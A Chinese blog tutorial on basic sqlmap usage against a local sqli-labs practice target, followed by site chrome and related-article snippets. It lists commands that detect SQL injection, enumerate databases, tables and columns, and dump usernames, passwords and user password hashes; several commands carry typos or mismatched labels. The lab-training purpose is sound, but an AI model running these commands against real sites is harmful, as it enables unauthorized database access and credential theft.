sqlmap基础使用方法

已于 2023-09-08 09:42:03 修改
阅读量80 收藏
点赞数 1
分类专栏: 渗透工具的使用 文章标签: web安全
于 2023-09-07 16:26:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/j2941174356/article/details/132740806
版权

sqlmap基础语法

  1. 判断是否存在注入点
    1. # sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1"
    2. 会提示是否有注入点和注入的方式
  2. 判断文本中是否存在注入点
    1. 使用 burp suite 抓取 HTTP头部信息1
      2. 创建文本 1.txt 将头部内容 书写到 1.txt
    2. sqlmap -r 1.txt --batch     
      1. --batch 为自动命令,免除手动改确认信息
    3. 提示注入点以及注入类型
  3. 获取当前数据库名称
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -dbs --batch 
  1. 获取数据库的表名称
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -tables --batch
  2. 获取数据库的列名称
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -T 'users' --coulmns --batch
  3. 获取数据
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" -D 'security' -T 'users' -C 'password , username' --batch --dump
  4. 查看数据库的管理者(需要拥有权限)
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --users  --batch
  5. 查看数据库用户的密码
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --password  --batch
  1. 查看当前数据库的名称
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --password
  2. 查看当前数据库的用户
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --current-user --batch

sqlmap的一些参数

  1. --level 5  探测等级,等级越高探测的广度越大 耗时越长
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --level 5  --batch
  2. is-dba     判断当前用户是否为管理员用户
    1. sqlmap -u "http://192.168.124.53/sqllabs/Less-1/?id=1" --is-dba  --batch
      2. false 不是管理员用户 true 为管理员用户
雨季小朋友
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap基础操作1
08-04
以下将详细介绍SQLMap基础操作,主要关注三种注入模式:布尔型盲注、时间型盲注和报错注入,并结合提供的命令行参数进行解析。 1. **布尔型盲注**: 这种注入方式是通过页面返回结果的不同来判断SQL语句的真假。...
sqlmap使用.docx
06-28
Sqlmap的注入技术涵盖了多种方法,如基于布尔的盲注、基于时间的盲注、基于错误的注入、UNION查询注入、堆叠查询以及离带注入等。这些技术使得Sqlmap能够适应各种不同类型的SQL注入漏洞。 在使用Sqlmap时,首先需要...
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...
sqlmap-master
01-04
2. **枚举**:一旦找到注入点,SQLMap会枚举出数据库的用户、权限、表名、列名等信息,为后续的攻击提供基础。 3. **数据提取**:通过构造特定的SQL查询,SQLMap可以读取或下载数据库中的任意数据,包括敏感信息如...
sqlmap使用手册集合
06-10
本手册集合将全面介绍SQLMap使用方法和技巧。 一、SQLMap基本概念 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,控制或获取数据库中的敏感信息。SQLMap通过自动识别和利用这些注入漏洞,可以...
【网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
等风来
07-15 147
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
【网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 472
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 924
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 933
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 355
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
网络安全-网络安全及其防护措施1
LS_Ai的博客
07-14 1016
网络安全是指保护网络系统及其数据免受未经授权的访问、使用、修改或破坏的过程。它包括对硬件、软件、数据和通信的全面保护,确保系统的机密性、完整性和可用性。网络安全涉及一系列的策略、技术和流程,用于保护网络和数据免受攻击、损失或未经授权的访问。机密性:确保信息只被授权人员访问和查看。完整性:保证信息的准确和完整,防止未经授权的修改。可用性:确保系统和数据在需要时可被合法用户访问。
网络安全防御【防火墙NAT智能选举综合实验】
miss_copper的博客
07-13 1360
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 815
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
【网络安全】PostMessage:分析JS实现XSS
最新发布
等风来
07-17 540
PostMessage是一个用于在网页间安全地发送消息的浏览器 API。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging),这在一些复杂的网页应用和浏览器插件中非常有用。
WAAP:Web应用程序与API保护的重要性,在网络安全上有什么作用
dexunyun的博客
07-14 601
WAAP通过多层防护机制,为Web应用程序和API提供全面的安全防护。相较于传统的应用程序安全解决方案,德迅云安全WAAP全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。通过全站防护管理平台,对网络L3-L7层各防护模块的安全策略进行统一管理,并通过数据聚合、情报协同,形成真正的纵深防护,简化运营工作的同时进一步提升整体安全的防护水位。
【网络文明】关注网络安全
Liang_z_的博客
07-13 987
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
自学黑客(网络安全
热门推荐
xv7676的博客
07-13 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
“萝卜快跑”仍然存在出现多处高危网络安全问题
Sunspot
07-14 1074
目前武汉已经实现全覆盖,由百度推出的无人驾驶技"萝卜快跑"_无人驾驶汽车,便宜又好使用,不超速,不绕路,只要在手机上下单,一键直达目的地缺点:情绪十分稳定,遇到堵车无法通过大数据定位转弯绕路,太死板。
web安全及内网安全知识
wuwenshequ的博客
07-09 1018
web安全和内网安全的知识总结,和文章推荐。这方面网上资料很多,于是小编就整合在了一起方便自己查看阅读
sqlmap使用基础
04-27
以下是SQLMAP工具的基础使用方法[^1]: 1. 获取数据库表: ```shell sqlmap -u "http://192.168.164.1/sqllabs/Less-1/?id=1" --dbms mysql -v 1 -D security --tables ``` 这个命令将会获取指定URL中的数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值